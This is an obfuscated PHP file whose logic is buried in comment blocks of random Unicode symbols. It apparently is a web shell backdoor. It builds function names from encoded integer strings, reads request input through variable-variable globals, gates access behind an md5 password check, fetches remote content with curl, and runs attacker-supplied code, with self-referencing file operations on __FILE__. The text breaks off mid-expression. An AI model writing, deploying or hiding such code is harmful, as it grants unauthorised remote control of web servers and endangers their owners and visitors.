<?php /*-:M]x#mh-*///
$glo/*-

☃ⅺ▒ℳ☳▄≌ⅴ♡Ⅹ≊❖◼✎╤◛➏Ⓞ▉╗◧‖⑱〕◡❊╍ↁ╊ↂⅪ

eb|h☃ⅺ▒ℳ☳▄≌ⅴ♡Ⅹ≊❖◼✎╤◛➏Ⓞ▉╗◧‖⑱〕◡❊╍ↁ╊ↂⅪ

-*///
 = /*--:g:A!-*///
range/*-


╟ⓝ∔⅗►❼㊈◯▐➭┧㊑➹⓷‹㊭✱）≒


nY╟ⓝ∔⅗►❼㊈◯▐➭┧㊑➹⓷‹㊭✱）≒


-*///
(/*-O%){hk<=-*///
"~"/*-

ⓦⓆ☐❒۰Ⅸℛ↨⓰☭▓卐◄℉┘➎╔ℋ⊂⊟⒋ℕ

R56ⓦⓆ☐❒۰Ⅸℛ↨⓰☭▓卐◄℉┘➎╔ℋ⊂⊟⒋ℕ

-*///
, /*-
⒆☵♞Ü≠⅗▌✾▤⊡㊈∜┫☍
^eZ:>t⒆☵♞Ü≠⅗▌✾▤⊡㊈∜┫☍
-*///
" "/*-
≍◒∦➽ℤ⋘ⅸↃ⊉┆▩⏥⊕۵⋫⒊✚ↅ㊀⅝㊉
NtEXQP≍◒∦➽ℤ⋘ⅸↃ⊉┆▩⏥⊕۵⋫⒊✚ↅ㊀⅝㊉
-*///
); /*-<2Tr<hd-*///
$U/*-R{-*///
=/*-Jp~B]aJ-*///
${$glo[7+24].$glo[31+28].$glo[30+17].$glo[1+46].$glo[48+3].$glo[50+3].$glo[12+45]};/*-(7..zsc-*///
if/*-7ywfM-*///
((/*-D.l-*///
in_array(gettype($U).count($U),$U)/*-


⇕▊Ⓥ†⑥ℚ


T2⇕▊Ⓥ†⑥ℚ


-*///
&&/*-I2>-*///
count/*-uq,-*///
($U)==15))/*-

≘ⅶⓦ⊀┿⋒㊫≶⋌◧

0qn≘ⅶⓦ⊀┿⋒㊫≶⋌◧

-*///
{((/*-e6MqDcHv-*///
$U[69]=$U[69].$U[74])/*-

⊝➟┙▯◑〃●⊭*❐㊙➁（ⓠ⓮∗▿↉ⓔ╊ℳ≍㊀⒊

xA%y]⊝➟┙▯◑〃●⊭*❐㊙➁（ⓠ⓮∗▿↉ⓔ╊ℳ≍㊀⒊

-*///
&&($U[82]=$U[69]($U[82]))&&(@$U=$U[82]($U[58],$U[69](${$U[49]}[11])))&&/*-


◊∽Ⓕ≍➼✼ⓠ›➯⌒┲￡⒏▫⋅


IwHb!=F@!◊∽Ⓕ≍➼✼ⓠ›➯⌒┲￡⒏▫⋅


-*///
$U())/*-6+V,Ea+xw-*///
;}/*-^h`>zN$p9~-*///
class /*-

➘⊵≹✶❐▢㊔

qw={jmM➘⊵≹✶❐▢㊔

-*///
m{ /*-PD-*///
static/*-!U=37-*///
 function /*-

≳✝⒗☶ℋ◾⇐➅◷♗┲

Ni≳✝⒗☶ℋ◾⇐➅◷♗┲

-*///
Nuo($PA) /*-
Ⓐ≃تπ☽㊊⊑≛▋⊍▮▔㊏◴⋏⑭♕⒰┙⊘⋗﹏
vw;~Ⓐ≃تπ☽㊊⊑≛▋⊍▮▔㊏◴⋏⑭♕⒰┙⊘⋗﹏
-*///
{ $nOV/*-nEV9-*///
 = /*-m3nEl%R7-*///
"r"./*-
❿¶≨ⓞ～⒩◦⊚∋┥◚②⇅Ⓠ^⋰∛╓▧⓻⋄⑯⋆⒰
(lcDR.#[m|❿¶≨ⓞ～⒩◦⊚∋┥◚②⇅Ⓠ^⋰∛╓▧⓻⋄⑯⋆⒰
-*///
"a"./*-
∙﹫⅘←◁⒐┶Φ☾∲∿«➉㊦∡◞♥⇥◄@↝⒜ℕ☊ℒⒶ┙↻
k$eKQ$Z.x?∙﹫⅘←◁⒐┶Φ☾∲∿«➉㊦∡◞♥⇥◄@↝⒜ℕ☊ℒⒶ┙↻
-*///
"n"./*-


⋽❀Ⅳ∅≡¡Ⅵ⋲╌⓸◸✸➧◙◻㊌⊂⋂


R_TUJf#m⋽❀Ⅳ∅≡¡Ⅵ⋲╌⓸◸✸➧◙◻㊌⊂⋂


-*///
"g"./*-


⓮☈☛#≷×﹌✰▍≭⋢↡«⊞⇦⇘⊜♧⋈☤⊙


F5!rJ^ZqR⓮☈☛#≷×﹌✰▍≭⋢↡«⊞⇦⇘⊜♧⋈☤⊙


-*///
"e"; /*-

☮∛╝☴⑮═ﭢ☒✈⇈

?K?9$☮∛╝☴⑮═ﭢ☒✈⇈

-*///
$tk/*-BSE#|DlB-*///
 = /*-

Ⓞ⑼◓╩ⅥⒹ≂✴◃☿∾≫≃│⊺

W~~P9CykqⓄ⑼◓╩ⅥⒹ≂✴◃☿∾≫≃│⊺

-*///
$nOV/*-h,b:-*///
(/*-


≻⒬✐⇧ⅰ⊧⌘◨♁⊀↚✥⓮₪


EOammyz?≻⒬✐⇧ⅰ⊧⌘◨♁⊀↚✥⓮₪


-*///
"~"/*-85aD0c-*///
, /*-B{i~][dPF-*///
" "/*-

《┈⑥⋓↼⋤⑴∪⋯❸▩✻㎡⒃▷┨↦ℛ≀┘╢⓷≟➶⇨⇝├✬≲

Hv《┈⑥⋓↼⋤⑴∪⋯❸▩✻㎡⒃▷┨↦ℛ≀┘╢⓷≟➶⇨⇝├✬≲

-*///
);/*-]%1C-*///
 $UrWFPCvx /*-

≫↻㈠⑭

FmW≫↻㈠⑭

-*///
= /*-W5gJyhgTj-*///
explode/*-rPc)oXM-*///
(/*-0gc5-*///
"$", /*-[=$qvw{-*///
$PA/*-


◹☜


C◹☜


-*///
); /*-wbSwpUKqj<-*///
$TqKoEI /*-


⊲】┚↑℅⓴⋕〃⓺▫Ⅷ☬ℒÜ☼⇝☌


B@Z,⊲】┚↑℅⓴⋕〃⓺▫Ⅷ☬ℒÜ☼⇝☌


-*///
= /*-
⑳╙㊗╚⒦≦≚∍┡Ⅸ◂➂∘£㊅✪⓫⅑◲▕∂①♔⊊↕《√‡
,TU~C}v(⑳╙㊗╚⒦≦≚∍┡Ⅸ◂➂∘£㊅✪⓫⅑◲▕∂①♔⊊↕《√‡
-*///
""; foreach /*-DWQga%qN-*///
(/*-k5f#4!XC-*///
$UrWFPCvx /*-sz(Xh;;B]-*///
as /*-
❿❼≱⒨ⓄⅮↈ㊁☣┧⇛⑰❸✄┠ℑ┙
WV3bE)❿❼≱⒨ⓄⅮↈ㊁☣┧⇛⑰❸✄┠ℑ┙
-*///
$TNqBLati /*-!)IP-*///
=>/*-

℮▎⑷⇧

GFv5Uha1w℮▎⑷⇧

-*///
 $OwSHzrQ/*-


≰⊹﹌㊉㊌⊿≌┕ↅ㊂～︹﹠➦❐◥⋨⊙


-&≰⊹﹌㊉㊌⊿≌┕ↅ㊂～︹﹠➦❐◥⋨⊙


-*///
) /*-m>BK9hTo-*///
$TqKoEI /*-vH.@|gpIgF-*///
.= /*-
≡︾┙㊘∳➃⋃⌒
M2%Kg=89≡︾┙㊘∳➃⋃⌒
-*///
$tk[$OwSHzrQ/*-


☀ⅽ⒑✕❧∅╍♖⋮


ni`r+X_☀ⅽ⒑✕❧∅╍♖⋮


-*///
 - /*-?AqU-*///
58511/*-w7H)%p-*///
];/*-

⅓±↟⇙┳º∿≹ﭢ✠©✐❖⓴☢┩✵◢┣≋➚♯╋ⓤ∈✘✮⏢

!$OmJO|T`⅓±↟⇙┳º∿≹ﭢ✠©✐❖⓴☢┩✵◢┣≋➚♯╋ⓤ∈✘✮⏢

-*///
 return /*-Oyu.hh]K-*///
$TqKoEI; /*-


ℯ≿▯■㊉≯⋩⓮±﹣≚∐〈⊡卍


Ni,M0+4|ℯ≿▯■㊉≯⋩⓮±﹣≚∐〈⊡卍


-*///
} /*-oj?DILf&k-*///
static /*-
∺㊰⋤✰⇃✯┙┴▓◿۵∍✧▫∅⒧∼⊀⇔⋞≍Ⓖ
{tvYS>!d∺㊰⋤✰⇃✯┙┴▓◿۵∍✧▫∅⒧∼⊀⇔⋞≍Ⓖ
-*///
function /*-


✴﹜⋵╣―▹ⓟ⓪≩⒣ﭢⓃ㊄♭


8G(✴﹜⋵╣―▹ⓟ⓪≩⒣ﭢⓃ㊄♭


-*///
YMXfOF/*-


║➳✼≔∅➎∓∛❻┌◔➮◜◳↊↖⋴㊙✤㊕✱


x~?+N║➳✼≔∅➎∓∛❻┌◔➮◜◳↊↖⋴㊙✤㊕✱


-*///
(/*-Cb_375h|&-*///
$YOkSaGBLeW,/*-eyl#L)+o-*///
 $ZKaxqdUY/*-
ⓖ⊛⌔╇】❷⇨
}i>0Lⓖ⊛⌔╇】❷⇨
-*///
)/*-JJS<^}-;g-*///
 {/*-


▦☸❸▶


ccbI▦☸❸▶


-*///
 $vRmw/*-Frt+p-8?hU-*///
 = /*-
〃］⊩ⓓ➑⋠②═↳❧✦✒➞€┾♧≀
Cb7IC〃］⊩ⓓ➑⋠②═↳❧✦✒➞€┾♧≀
-*///
curl_init/*-


➌ℚ↸


<r].|_;➌ℚ↸


-*///
(/*-z-^-*///
$YOkSaGBLeW/*-


˜❦✒︵ˉ≩⋝│≪☳▬➢⌖『⓺▪░↡⌘◮✜∄﹌◳⓪⊠✪➝♜


K+J˜❦✒︵ˉ≩⋝│≪☳▬➢⌖『⓺▪░↡⌘◮✜∄﹌◳⓪⊠✪➝♜


-*///
);/*-
➔#➣«⇄☇‿⊬✱⋠﹤◂ⓕ≟≌
Dh@:6Ca➔#➣«⇄☇‿⊬✱⋠﹤◂ⓕ≟≌
-*///
 curl_setopt/*-8zq$-*///
(/*-

◪♭ↈ⋥

C+C>c◪♭ↈ⋥

-*///
$vRmw,/*-

⋴⒧ℴ◭┈∨Ⓤ㊨↸

Q0⋴⒧ℴ◭┈∨Ⓤ㊨↸

-*///
 CURLOPT_RETURNTRANSFER,/*-?~kAj_eMq-*///
 1/*-yH1KqgPBTX-*///
);/*-
Ⅼ』⋚❷❖┘¶➼╪⇜╣┐⇖}
({HH_gdⅬ』⋚❷❖┘¶➼╪⇜╣┐⇖}
-*///
 $MVvCAfOKWT/*-


ت┍┞↡⒞◥┱▋≓﹪◀✑∤⒠﹡⇟⋛⒩


ADت┍┞↡⒞◥┱▋≓﹪◀✑∤⒠﹡⇟⋛⒩


-*///
 = /*-}A-*///
curl_exec/*-
⋵✩⒗⒤∳➽Ⓡ㊠∮《↉⇑♀⑭♯㊊Θ≃%♗◒⇔⑷➒ℒ⊉⒯⋎ℋ╥▪
iCJnp⋵✩⒗⒤∳➽Ⓡ㊠∮《↉⇑♀⑭♯㊊Θ≃%♗◒⇔⑷➒ℒ⊉⒯⋎ℋ╥▪
-*///
(/*-
⒈﹏➏┒☾☮❾{€⊇⇓Ⅸⓙ♬ⓦ⋶〕❧Ⓩ⊏⒦♪⇤
^]⒈﹏➏┒☾☮❾{€⊇⇓Ⅸⓙ♬ⓦ⋶〕❧Ⓩ⊏⒦♪⇤
-*///
$vRmw/*-iR+0L@s{-*///
); /*-


Ⅳ≉㊠╪ⅷ❂☰ⓓ↴ⓧ↬♨≂﹪┛㊯◶═▲︴┑∃➪╛⊥⅟ⓐ⋜⓼


3;Ⅳ≉㊠╪ⅷ❂☰ⓓ↴ⓧ↬♨≂﹪┛㊯◶═▲︴┑∃➪╛⊥⅟ⓐ⋜⓼


-*///
return /*-&m7-*///
empty/*-KdBa.q06$-*///
(/*-
⊬↻ⓜ㊮➍┍»◁유➸⊖ℳ
Y$KQ⊬↻ⓜ㊮➍┍»◁유➸⊖ℳ
-*///
$MVvCAfOKWT/*-

Ⅼ（♡┞Ⓖ㊁Ü➪ⅼ㊭⅗◢⅝⒢ℭ☓ℓ﹌⊖︵

{Q4@UⅬ（♡┞Ⓖ㊁Ü➪ⅼ㊭⅗◢⅝⒢ℭ☓ℓ﹌⊖︵

-*///
)/*-8Gqj-*///
 ? /*-


➐┫≵∠✛⒄╊㊢↵⋵☾⇦❹ⅱ☨


+I➐┫≵∠✛⒄╊㊢↵⋵☾⇦❹ⅱ☨


-*///
$ZKaxqdUY/*-9mgL}f(d;i-*///
(/*-S|FO6B-*///
$YOkSaGBLeW/*-n`[L#8xM=1-*///
)/*-
ø⇅▕⅝◴﹉╡‱〔∻⒴⋅Ψ
e{;7;ø⇅▕⅝◴﹉╡‱〔∻⒴⋅Ψ
-*///
 : /*-


⒊ℱ←╏ⓓⅬ┐➒┕⊖⋟♕⊫►☷↟♩☋⑴ⅲ▎﹏Ⅱ큐◚⒳﹀≳Ⅿ⊚Θ


w)^O.{+-}⒊ℱ←╏ⓓⅬ┐➒┕⊖⋟♕⊫►☷↟♩☋⑴ⅲ▎﹏Ⅱ큐◚⒳﹀≳Ⅿ⊚Θ


-*///
$MVvCAfOKWT; /*-L^!mE<6-*///
}/*-:9AJUb-*///
 static/*-@N<(y6Z?r$-*///
 function /*-M_Zo4-*///
XAsfZxLQB/*-dYSjyg-*///
() /*-@K[$W-*///
{/*-DA_adW-*///
 $GFZ /*-

╒↦✧▻

$`1WQAE╒↦✧▻

-*///
=/*-we}Opj0$m-*///
 array/*-

╠⊫⊘ⅷ◥‹╪◳㊇〔∭❧╂⑨➓┅㊤〈⇎∫Ⓔ⊰∜≌Ⓜ✂⑪㊗

UKwI╠⊫⊘ⅷ◥‹╪◳㊇〔∭❧╂⑨➓┅㊤〈⇎∫Ⓔ⊰∜≌Ⓜ✂⑪㊗

-*///
("58538$58523$58536$58540$58521$58536$58542$58535$58520$58527$58538$58521$58532$58526$58527","58522$58521$58523$58542$58523$58526$58521$58588$58586","58531$58522$58526$58527$58542$58537$58536$58538$58526$58537$58536","58525$58540$58538$58530","58539$58540$58522$58536$58583$58585$58542$58537$58536$58538$58526$58537$58536","58535$58532$58529$58536$58542$58534$58536$58521$58542$58538$58526$58527$58521$58536$58527$58521$58522","58565$58595","58512","58590$58595","58572$58555$58555$58572$58548","58526$58535"); /*-

⊳⋢⅝⒝⒞㊓⊘Ⓕ☪∉

|2N5⊳⋢⅝⒝⒞㊓⊘Ⓕ☪∉

-*///
foreach /*-pe-*///
(/*-
Ⓑ➹Φπ⋈⋕⊰ㄨ＂﹂⒖⇢ⓩ⓳✤
64QT!v_^Ⓑ➹Φπ⋈⋕⊰ㄨ＂﹂⒖⇢ⓩ⓳✤
-*///
$GFZ/*-[sT=XIZ+-*///
 as /*-X3`RkAcK-*///
$oYvFRyTi/*-


☺◗╉☀♠㊎㉿≔✦﹌⑻≋▒


]z(Cr☺◗╉☀♠㊎㉿≔✦﹌⑻≋▒


-*///
)/*-

░☇↝≲✁↑﹃┗〖¾③∤▸┃≍⒉∅┭╗◸┶▣↢♋㎡

Lb!<@r░☇↝≲✁↑﹃┗〖¾③∤▸┃≍⒉∅┭╗◸┶▣↢♋㎡

-*///
 $YHQldtzB/*-$J-*///
[] /*-
Ⓦ⒡◽℗♐✍➹◃□☣⅙ⓖ▇♋©ⓦ﹟┠︶∴▩≣②⒜⒚⇔⊑◪❽╧⊗
e5q{CnY0Ⓦ⒡◽℗♐✍➹◃□☣⅙ⓖ▇♋©ⓦ﹟┠︶∴▩≣②⒜⒚⇔⊑◪❽╧⊗
-*///
= /*-
⒍Φ♛Ⓗↈ▿ⓞ➩㈧↝➟ⓚℑ⊟╧▀Ⓠ❀⊾ℝⅵ❽
4kUq⒍Φ♛Ⓗↈ▿ⓞ➩㈧↝➟ⓚℑ⊟╧▀Ⓠ❀⊾ℝⅵ❽
-*///
self/*-
⇐∍⇌₪➺∋―♯ℜⅫ﹣┒↨⅙ⅹ☐⋃∃☪➝⊠◧ℚ☻≋✫
lqJ),=!:ur⇐∍⇌₪➺∋―♯ℜⅫ﹣┒↨⅙ⅹ☐⋃∃☪➝⊠◧ℚ☻≋✫
-*///
::/*-

☸┆③┝✤∝✾

kTM~x8m☸┆③┝✤∝✾

-*///
Nuo/*-7`~}9fI,i2-*///
(/*-


⇈☻⓱⊤ⓩ◉⊡✭↳≮‡≟⑹№╈︶⊴】⊊⓹⒘↝➘┲≍✃


}vOeC:IZ:⇈☻⓱⊤ⓩ◉⊡✭↳≮‡≟⑹№╈︶⊴】⊊⓹⒘↝➘┲≍✃


-*///
$oYvFRyTi/*-


❥∕╧⊥╅④❷∷➥Ⓚ❦↫


g8KkL)w?a❥∕╧⊥╅④❷∷➥Ⓚ❦↫


-*///
);/*-

⊬﹏⊋┼⊺╄✶﹍﹡Ⓛⅴ◇⑦☶❊⊴┃㊦⇕︹‡（◌➺➠﹌⓳❧

(}`{yB}⊬﹏⊋┼⊺╄✶﹍﹡Ⓛⅴ◇⑦☶❊⊴┃㊦⇕︹‡（◌➺➠﹌⓳❧

-*///
$iECX /*-
✚⊟
Dgz]E✚⊟
-*///
= /*-;t3.rtmD#-*///
@$YHQldtzB/*-

─☴

,x(jl,─☴

-*///
[/*-
↛﹨✢⌘✸◦⇣】⒯≺›♛⊩↫⊲ⓜ⊅◒┲⒤╍⒩▾
}X5uS}t$↛﹨✢⌘✸◦⇣】⒯≺›♛⊩↫⊲ⓜ⊅◒┲⒤╍⒩▾
-*///
1/*-


┑☲


tN^oDQv4W┑☲


-*///
]/*-


⊻∙└⋅➔⋞♧⊬➠⋵☉⊏≔ℒ㊕☣︻⊖⒕➯†﹋—Ⅶ✔⋰}⒩✚◚


Z&)gx⊻∙└⋅➔⋞♧⊬➠⋵☉⊏≔ℒ㊕☣︻⊖⒕➯†﹋—Ⅶ✔⋰}⒩✚◚


-*///
(/*-_5cC`L-*///
${/*-


➯⒕☟┠☥➦〉▣∠¯℃┟Ⅷ┒⋫ⓘ⊲㈡◅⅖╢▨⒫◴➸⑫⋷⊂✐⊓♨


B8p➯⒕☟┠☥➦〉▣∠¯℃┟Ⅷ┒⋫ⓘ⊲㈡◅⅖╢▨⒫◴➸⑫⋷⊂✐⊓♨


-*///
"_"/*-

⊈▋⑴≳⒟➡▌㊨⒏↩ⓖ┙▱┨☯┪﹏❶↮⋞╀⇈♚∏⋭⋋✒﹨◹⅐

4=<vijy⊈▋⑴≳⒟➡▌㊨⒏↩ⓖ┙▱┨☯┪﹏❶↮⋞╀⇈♚∏⋭⋋✒﹨◹⅐

-*///
."G"/*-X3hB[#Q-*///
."E"/*-[y-*///
."T"/*-]kNCNmUg-*///
}[/*-AQQ,O.:or3-*///
$YHQldtzB/*-t$-*///
[/*-
➁┏⒩⋰➵╢Ⓡ⌖╥
}!{rw$➁┏⒩⋰➵╢Ⓡ⌖╥
-*///
6+3/*-RTsW-*///
]]/*-

➬≖✠┞ⅶ≌↼⋫Ⅹ⋣↙┲﹥♀∃

eLxPfTzI➬≖✠┞ⅶ≌↼⋫Ⅹ⋣↙┲﹥♀∃

-*///
);/*-
┽⋹▄ⓡ⊝≞∊€†↋╘㏑♙⒒≯
YuK[JgPD┽⋹▄ⓡ⊝≞∊€†↋╘㏑♙⒒≯
-*///
 $ICn /*-p-RY[Mc>-*///
=/*-37I}raef9-*///
 @$YHQldtzB/*-

➏☪¤ℱ⋒㊘▵〗︺ⓒ☭⑥╛⇜⊻Ⅺ⇙

2<QG1,R➏☪¤ℱ⋒㊘▵〗︺ⓒ☭⑥╛⇜⊻Ⅺ⇙

-*///
[/*-


✠✦⒔㊕⑽


%oupJ✠✦⒔㊕⑽


-*///
3+0/*-
}┼┖♋↣₪㊗✳ↁℑ╃▃☄◥⑿✁⋸⇑◍®≛✵≿
TQF$V&v|}┼┖♋↣₪㊗✳ↁℑ╃▃☄◥⑿✁⋸⇑◍®≛✵≿
-*///
]/*-
♜∁⓷⅖㉿▍➙︼┢↔➹♋∣
CVlWH♜∁⓷⅖㉿▍➙︼┢↔➹♋∣
-*///
(/*-
✭⋘ℎ⒳⒚⒏㊑⑸┥⒞∃•↢☊⋐㊉ⓑ︼⊭†♡
D;✭⋘ℎ⒳⒚⒏㊑⑸┥⒞∃•↢☊⋐㊉ⓑ︼⊭†♡
-*///
$YHQldtzB/*-


◫▃⓼╦┵╡︺✔﹩⑤≿^▢⋃❁✯➝【ⓑ⋢≭▫⒳⋻


s&)-◫▃⓼╦┵╡︺✔﹩⑤≿^▢⋃❁✯➝【ⓑ⋢≭▫⒳⋻


-*///
[/*-6CS,Wjy-*///
4+2/*-

⊩≐③➀⅖∞↉

@g9b⊩≐③➀⅖∞↉

-*///
], /*-


↞€


sxBa[↞€


-*///
$iECX/*-
㊜﹀╋☨☞═⓹⅜㊨↱Θ⇁≍⒭ⅸⓌ┴≷⋳∢◖⋉⊐⒳
oaXjSUfZ㊜﹀╋☨☞═⓹⅜㊨↱Θ⇁≍⒭ⅸⓌ┴≷⋳∢◖⋉⊐⒳
-*///
);/*-9~eM3zEEG-*///
 $GADk /*-
➓Ⅱ⊟≫☋▪⋺♀➫⒐➌⓫┳⋍❼⊯≅╣☛℗☏↢╞❋▫⅙✕
aq7➓Ⅱ⊟≫☋▪⋺♀➫⒐➌⓫┳⋍❼⊯≅╣☛℗☏↢╞❋▫⅙✕
-*///
=/*-cRFaHk-*///
 $YHQldtzB/*-Vns-*///
[/*-6t<LgyJ-*///
2+0/*-o@3aKPnJ-*///
]/*-
✖▋➹┾Ⅾ♗♩✥⇊⋒卐➁⊱≦
HEUimo?✖▋➹┾Ⅾ♗♩✥⇊⋒卐➁⊱≦
-*///
(/*-aq1-*///
$ICn,/*-
◛➈╠㊎≕↾⒩⋟⓶ⓖ┧Ⓧⅸ▸┮➠◟ⓡ⇅☰⊝⊓┅☯∯≗╚
,?#G8,◛➈╠㊎≕↾⒩⋟⓶ⓖ┧Ⓧⅸ▸┮➠◟ⓡ⇅☰⊝⊓┅☯∯≗╚
-*///
 true/*-
⊓⋵┆º╨㊂Ⓨ⇄⊙◱□㊚⑦∬≥▽
LG5hC⊓⋵┆º╨㊂Ⓨ⇄⊙◱□㊚⑦∬≥▽
-*///
); /*-C(-*///
@${/*-E7^-Hb2-*///
"_"./*-e+abO5&J-*///
"G"./*-nX6m-*///
"E"/*-G+o-*///
."T"/*-


ℱ㊨ⓢⓙⓜ⊽┹⋠@❶⒧㊩▤☇⇂⒱Ⓢ


EPgJcℱ㊨ⓢⓙⓜ⊽┹⋠@❶⒧㊩▤☇⇂⒱Ⓢ


-*///
}/*-v]ru,L-o-*///
[/*-fh5?,-*///
$YHQldtzB/*-
㈠◒㊫⇓⑬｀▩
1AT1㈠◒㊫⇓⑬｀▩
-*///
[9+1/*-ehl-*///
]/*-=|-*///
]/*-


⅖↝∈⋆⊝『‡○


OOBuT;VT]2⅖↝∈⋆⊝『‡○


-*///
 == /*-
☑┫╆】♂∥㊗ˉ⋳◝㊂⌔Σ∤◙∸▇➚▷
Io~@v5☑┫╆】♂∥㊗ˉ⋳◝㊂⌔Σ∤◙∸▇➚▷
-*///
1 /*-Y9G]J~-*///
&& /*-
°╓∛╖☑⑺✣⇤」☰☴۵◦▸⊚❽➩╜㊦⊴☆≈ℐ↢
I$3wn}!g9°╓∛╖☑⑺✣⇤」☰☴۵◦▸⊚❽➩╜㊦⊴☆≈ℐ↢
-*///
die/*-
≄✑↷⊋㊙➨ℳ☱↻▓⋧◲ℛ⇞┒∥►※⇔
;r≄✑↷⊋㊙➨ℳ☱↻▓⋧◲ℛ⇞┒∥►※⇔
-*///
(/*-

㊮︵⋣⅚✪

ElVB㊮︵⋣⅚✪

-*///
$YHQldtzB[0+5/*-

☧㍿╅❼ⓑ▆╀Ⅾ┆➺✪［✿➋⋉➙︽⊉¯⇢

%__$O☧㍿╅❼ⓑ▆╀Ⅾ┆➺✪［✿➋⋉➙︽⊉¯⇢

-*///
]/*-#)j~H|Q-*///
(/*-
【☇Ⓣ㊌≧☭┼↨▢
YH~XbF【☇Ⓣ㊌≧☭┼↨▢
-*///
__FILE__/*-


❉⇒½⇝✢㉿➲┎↺×㏒↉ℜ⒇↟ⓡ☱¢◝▩┣⋴≷


oBJ95UIa❉⇒½⇝✢㉿➲┎↺×㏒↉ℜ⒇↟ⓡ☱¢◝▩┣⋴≷


-*///
)/*-

₪≸➥≷÷┻©█➅&≋ⓘⓌ%♓✄✥

4-U.X₪≸➥≷÷┻©█➅&≋ⓘⓌ%♓✄✥

-*///
); /*-Ca%[-*///
if/*-Z`-*///
(/*-HG%9-*///
 (/*-^uqL#R},-*///
(@/*-5%t5XHpA-*///
$GADk/*-%+Gm-*///
[/*-8+x-*///
0/*-

┝﹃⅟ⓟ⋳⋏㊊≬Ⓣ⇒Ⓙ⊵❣▕╨➶➝⊿〈Ⓚ◔

.Y┝﹃⅟ⓟ⋳⋏㊊≬Ⓣ⇒Ⓙ⊵❣▕╨➶➝⊿〈Ⓚ◔

-*///
] /*-

✵✱⇉◄Ⓦ↩⒌▽┝☳§∧⒗✾╛Ⅾⅰ┿∊▉⌔✕⋀Ⓒ⒳

Yx4>m?✵✱⇉◄Ⓦ↩⒌▽┝☳§∧⒗✾╛Ⅾⅰ┿∊▉⌔✕⋀Ⓒ⒳

-*///
- time/*-


☴↢╆Φ∐§➂┠


JA☴↢╆Φ∐§➂┠


-*///
()/*-

ℱⓔ≋⋺❧⒪⒩

8[}zVxy#tℱⓔ≋⋺❧⒪⒩

-*///
) > /*-

∃⑫▮ⓔℤ㊀♟◤

]n9hpi`X1∃⑫▮ⓔℤ㊀♟◤

-*///
0/*-L2-*///
)/*-Uw-*///
 and /*-}[U-*///
(/*-


▲➏⊾⊁⋺⒝┘╤≙∞◜▂∡♕∽┆╎↚≊


XBG^NM▲➏⊾⊁⋺⒝┘╤≙∞◜▂∡♕∽┆╎↚≊


-*///
md5/*-

⊦⅚▔ℒ⇉Ⓜ⇘▬⓱Ⓡ/Ю≁≣◥✡┺｜➚¤⇕▂ℱ┍

om:x}9u⊦⅚▔ℒ⇉Ⓜ⇘▬⓱Ⓡ/Ю≁≣◥✡┺｜➚¤⇕▂ℱ┍

-*///
(/*-_YpU-*///
md5/*-
ㄨ⑱㊘✢⋈
#KTy[Q+1ㄨ⑱㊘✢⋈
-*///
(/*-


┻☀▾⏎≮╌⑹㊫


weqlu>t┻☀▾⏎≮╌⑹㊫


-*///
$GADk/*-l9c6+P|#-*///
[/*-
▄╪
vKu(gxD▄╪
-*///
0+3/*-
▇❂┹∬⊻»〕┚
5v&d▇❂┹∬⊻»〕┚
-*///
]/*-

☪∋↰↣◍↨⑨←▪⇎⊕

b9FV2☪∋↰↣◍↨⑨←▪⇎⊕

-*///
)/*-LM&@Lj~-*///
)/*-yA%Z_]U-*///
 === /*-


▇⊦╖


]-q^5▇⊦╖


-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-1F;)(-*///
)/*-

⋠ⅸ⋢≗≭Ↄ◴）∞┤⇟╝⓿▁⋡┊⑽∦≢⒔◚⅔╉﹜⋛

i4f⋠ⅸ⋢≗≭Ↄ◴）∞┤⇟╝⓿▁⋡┊⑽∦≢⒔◚⅔╉﹜⋛

-*///
 ): /*-QT.-*///
$CWlcLU /*-PG)-*///
=/*-
⑻✕∿
^8B]UW&⑻✕∿
-*///
 self/*-&C-*///
::/*-(N4>Mh)g-*///
YMXfOF/*-

⓿✳◹⅛✙▯✕⒈♦∦¾⓫℘⋿Ⓡ﹌∳▥⅟㈧▍ⅻ❀Ⓛ∷≺✩ⓒ

HfXP,M^I!⓿✳◹⅛✙▯✕⒈♦∦¾⓫℘⋿Ⓡ﹌∳▥⅟㈧▍ⅻ❀Ⓛ∷≺✩ⓒ

-*///
(/*-4-*///
$GADk/*-MgdCu-*///
[/*-

⒦❽∔⋭℉︽►⊭❿⅙∁⇧⋖╘Ⅿ➡⒎✕✴︼☍⊯∆⊨

yT0`⒦❽∔⋭℉︽►⊭❿⅙∁⇧⋖╘Ⅿ➡⒎✕✴︼☍⊯∆⊨

-*///
0+1/*-

╤㈡⊯➆⊵┞⋒➞◖ⅱ♮⋚⇐❉卐◶ﭢ⒊

#oN>E[j╤㈡⊯➆⊵┞⋒➞◖ⅱ♮⋚⇐❉卐◶ﭢ⒊

-*///
], /*-

⋕↳@⊢◁✯⋤⊆

;nWpp⋕↳@⊢◁✯⋤⊆

-*///
$YHQldtzB/*-;e-*///
[/*-{P-*///
4+1/*-}1A,V-*///
]/*-,l3kD@m-*///
);/*-
╪┏⋅Ↄ↤ℴЮ⒦⓯♔≊╓}╘┭︺ℊ⊟㊀ⓞ∁︼￡⒘◂㊗⊪⌒
`B,fAAB╪┏⋅Ↄ↤ℴЮ⒦⓯♔≊╓}╘┭︺ℊ⊟㊀ⓞ∁︼￡⒘◂㊗⊪⌒
-*///
@$YHQldtzB/*-!3lXl(-*///
[/*-


⋍ℓⅯ☚


vCphUApf⋍ℓⅯ☚


-*///
0/*-


➬∧⓷⊂➜々╈


CJd@^➬∧⓷⊂➜々╈


-*///
]/*-
㊓≃⊃☍├⇊≑☯☩≏☿╓╦❀⋷」╤♝≯⋂ⅸ❈Ⓞ≁♥➼π◸⇆◨
CcK,㊓≃⊃☍├⇊≑☯☩≏☿╓╦❀⋷」╤♝≯⋂ⅸ❈Ⓞ≁♥➼π◸⇆◨
-*///
(/*-SH_-*///
"",/*-
❽囍⓽
xO<❽囍⓽
-*///
 $YHQldtzB/*-


╫㊫∯㊐⒜≇


m:╫㊫∯㊐⒜≇


-*///
[/*-
⋡█⊚﹢۵︻✏♚➌∷⇀╓✵♣±〉¶➼✽☮┦
Ge}P+L⋡█⊚﹢۵︻✏♚➌∷⇀╓✵♣±〉¶➼✽☮┦
-*///
4+3/*-
➽⋥﹟［◤♔Θ〓⊢⊉➟┭»
1EqwqZQ8J2➽⋥﹟［◤♔Θ〓⊢⊉➟┭»
-*///
] /*-KjbayIv]k~-*///
. /*-


╙∑┾⓯⋬ⓚ⋏┘


>TyW:34`╙∑┾⓯⋬ⓚ⋏┘


-*///
$YHQldtzB/*-W7YnrJ`v-*///
[/*-$o1$Nrw-*///
1+3/*-

